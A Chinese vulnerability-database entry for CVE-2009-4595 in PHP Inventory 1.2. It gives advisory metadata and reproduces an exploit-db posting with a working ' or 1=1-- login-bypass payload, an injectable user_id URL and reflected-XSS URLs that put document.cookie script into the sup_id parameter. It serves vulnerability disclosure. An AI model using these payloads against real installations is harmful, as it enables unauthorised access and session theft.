PHP Inventory 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118752 漏洞类型 SQL注入
发布时间 2009-12-10 更新时间 2010-01-13
CVE编号 CVE-2009-4595 CNNVD-ID CNNVD-201001-065
漏洞平台 PHP CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/10370
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-065
|漏洞详情
PHPInventory1.2版本的index.php中存在SQL注入漏洞。远程认证用户可以借助供应者信息操作中的sup_id参数,执行任意的SQL指令。
|漏洞EXP
#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################

First of all lets login to admin with:

http://[server]/php-inventory/index.php

username: ' or 1=1--
password: ' or 1=1--

The app is riddled with SQL Injection. For example:

http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]

SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1

This of course means you can do some slightly dodgy refected XSS:

http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>

I leave the exploiting up to the reader.
|参考资料

来源:SECUNIA
名称:37672
链接:http://secunia.com/advisories/37672